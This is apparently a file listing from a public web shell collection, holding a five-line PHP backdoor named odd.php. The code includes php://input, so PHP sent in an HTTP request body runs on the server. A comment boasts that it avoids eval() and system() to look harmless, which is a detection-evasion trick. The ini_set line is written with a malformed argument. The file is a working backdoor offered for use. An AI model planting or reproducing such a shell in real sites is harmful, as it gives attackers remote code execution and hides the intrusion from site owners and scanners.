webshell/php/phpkit-1.0/odd.php
tennc df6d55ad4f update
php shell and jsp shell
2013-09-13 10:44:57 +08:00

5 lines
179 B
PHP

<?php
ini_set('allow_url_include, 1'); // Allow url inclusion in this script
// No eval() calls, no system() calls, nothing normally seen as malicious.
include('php://input');
?>